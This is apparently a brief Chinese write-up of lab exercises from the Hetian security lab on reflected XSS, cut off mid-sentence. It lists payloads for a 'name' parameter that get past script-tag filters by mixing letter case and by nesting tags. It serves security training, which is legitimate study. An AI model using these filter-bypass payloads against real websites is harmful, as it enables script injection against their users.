合天网安实验【XSS进阶1、2、三】

直接get,neme=<script>alert(1)</script>php 用正则过滤了<script>和</script>,咱们name=<Script>alert(1)</Script>html 用正则过滤了<script>和</script>(/i表示无视大小写),但只过滤一次,咱们嵌套绕过neme=<sc<script>ript>alert(1)</s</script>cript>,或
相关文章
相关标签/搜索